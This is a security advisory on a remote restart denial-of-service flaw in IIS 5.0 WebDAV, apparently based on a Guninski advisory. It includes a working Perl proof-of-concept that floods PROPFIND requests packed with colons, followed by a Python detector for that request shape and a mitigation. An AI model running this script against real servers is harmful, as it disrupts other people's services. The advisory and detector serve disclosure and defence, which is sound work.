IIS 5.0 remote restart

Vulnerability
 
    IIS
 
Affected
 
    IIS 5.0
 
Description
 
    The following is based on Georgi Guninski security advisory #44.
    It is possible to remotely restart all IIS-related services using
    a specially crafted request.  If this request is repeated
    continuously, it seriously affects IIS performance.
 
    Basically, the problem is a very long but valid PROPFIND request
    containing lots of ":".
 
    Demonstration:
 
    #!/usr/bin/perl
    use IO::Socket;
    printf "Written by Georgi Guninski wait some time\n";
    $port = @ARGV[1];
    $host = @ARGV[0];
    
    sub vv()
    {
    $ll=$_[0];
    $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") ||
    return;
    $over=":" x $ll ; # the ":" is the most important
    $ch=pack("C",65); # just to check whether potential payload is possible - yes
    $tmp = $ch x 64;
    $over= $ch x 4 . $over . $tmp;
    $over1=":" x $ll; #not sure about this
    
    $xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."$over1".':">';
    $xml=$xml.'<a:prop><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n";
    $l=length($xml);
    $req="PROPFIND / HTTP/1\.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
    syswrite($socket,$req,length($req));
    print ".";
    $socket->read($res,200);
    print $res;
    close $socket;
    }
    
    
    do vv(59060);
    #this is overflow, repeat several times - 49060 seems the smallest #, may need to change
    sleep(1);
    do vv(59060);
 
Solution
 
    Disabling WebDAV extensions may help, though we do not recommend
    using IIS on the Internet.
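
    A defensive check for the request shape described above, as an added example that is not part of the Guninski advisory: it flags PROPFIND requests whose body is oversized or carries a long run of ":" characters, for use in a proxy filter or when triaging captured requests. The thresholds, function names, host name and sample requests are assumptions constructed for illustration.

```python
import re

# Assumed thresholds, not taken from the advisory; tune against real WebDAV traffic.
MAX_COLON_RUN = 64           # a well-formed QName has a single ':' separator
MAX_BODY_BYTES = 16 * 1024   # PROPFIND bodies are normally a few hundred bytes

_COLONS = re.compile(rb":+")
_CLEN = re.compile(rb"^content-length:\s*(\d+)\s*$", re.I | re.M)


def inspect_request(raw: bytes) -> list:
    """Return the reasons a raw HTTP request matches the long-PROPFIND pattern."""
    # Accept CRLF and bare-LF header terminators alike.
    parts = re.split(rb"\r?\n\r?\n", raw, maxsplit=1)
    head, body = parts[0], (parts[1] if len(parts) > 1 else b"")
    fields = head.split(None, 1)
    if not fields or fields[0].upper() != b"PROPFIND":
        return []
    reasons = []
    m = _CLEN.search(head)
    # Use the larger of declared and observed size: captures may be truncated.
    size = max(int(m.group(1)) if m else 0, len(body))
    if size > MAX_BODY_BYTES:
        reasons.append("body of %d bytes exceeds %d" % (size, MAX_BODY_BYTES))
    longest = max((len(x.group()) for x in _COLONS.finditer(body)), default=0)
    if longest > MAX_COLON_RUN:
        reasons.append("run of %d ':' characters in body" % longest)
    return reasons


def build_request(method: bytes, body: bytes) -> bytes:
    """Build a constructed sample request for the demo (not captured traffic)."""
    head = b"%s / HTTP/1.1\r\nHost: dav.example\r\nContent-Type: text/xml\r\n" % method
    return head + b"Content-Length: %d\r\n\r\n" % len(body) + body


# Constructed sample bodies.
NORMAL_BODY = (b'<?xml version="1.0"?><a:propfind xmlns:a="DAV:">'
               b'<a:prop><a:displayname/></a:prop></a:propfind>')
SUSPECT_BODY = (b'<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'
                + b":" * 2000 + b'"><a:prop/></a:propfind>')

if __name__ == "__main__":
    for name, req in [("normal", build_request(b"PROPFIND", NORMAL_BODY)),
                      ("suspect", build_request(b"PROPFIND", SUSPECT_BODY)),
                      ("get", build_request(b"GET", SUSPECT_BODY))]:
        print(name, inspect_request(req) or "ok")
```

    Where WebDAV cannot be disabled outright, the same two conditions can serve as reject rules in front of the server.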
Credits
-- UnKnown --
